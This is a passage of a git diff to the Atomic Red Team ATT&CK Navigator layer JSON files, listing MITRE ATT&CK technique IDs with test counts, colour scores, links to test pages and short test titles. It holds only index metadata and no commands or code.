Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 795029d7..46fe8d19 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":31,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":60,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View 